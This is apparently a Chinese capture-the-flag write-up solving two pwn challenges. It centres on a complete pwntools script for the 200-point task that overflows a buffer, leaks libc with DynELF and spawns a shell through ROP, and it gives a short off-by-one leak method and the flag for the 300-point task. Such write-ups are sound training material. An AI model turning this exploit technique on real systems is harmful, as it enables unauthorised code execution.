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" alt="" />

200pts:

64位程序的rop、dynelf的利用，和32位有区别，注意寄存器（rdi,rsi,rdx）传参，leak的大小需要精准才能成功getshell（原理参考：http://www.purpleroc.com/md/2016-02-25@Thinking-About-Level2.html），泄漏system地址，传参getshell：

from pwn import *

e = ELF('./qwb3')

p=process('./qwb3')

#p=remote('106.75.8.230',19286)

poprdi = 0x400633

poprsi = 0x400631 # pop rsi; pop r15; ret = 0x400631

plt_write = e.symbols['write']

plt_read = e.symbols['read']

main = 0x40059d

junk = 'A' * 8

data = 0x601048

def leak_write(addr):

    global p

    p.recvuntil('pwn \n')

    payload = 'A' * 72 + p64(poprdi) + p64(1) + p64(poprsi) + p64(addr) + junk +p64(plt_write) + p64(main)

    p.send(payload.ljust(0x190, 'A'))

    ret = p.recv(40)

    return ret

d = DynELF(leak_write,elf=ELF('./qwb3'))

system = d.lookup('system','libc')

print system

print p.recvuntil('pwn \n')

payload2 = 'A' * 72 + p64(poprdi) + p64(0) + p64(poprsi) + p64(data) + junk + p64(plt_read) + p64(poprdi) + p64(data) + p64(system)

print "\n###sending payload2 ...###"

p.send(payload2)

#sleep(1)

#gdb.attach(p)

p.send('/bin/sh\0')

p.interactive()

300pts：

一开始无从下手，仔细想想，既然题目是leak，所以利用方式还是围绕输入来吧，限定了输入大小40，各种试溢出，试格式化字符串，最后输入name为'a'*40，flag为任一字符时可泄漏第一字节，第二次name不变，flag为第一次泄漏的字符加任一字符，泄漏第二个字符，以此类推得到flag，可以看出是off-by-one。

FLAG｛wh4t3v3r_1s_0k｝

巴特西

i春秋30强挑战赛pwn解题过程

最新文章

热门文章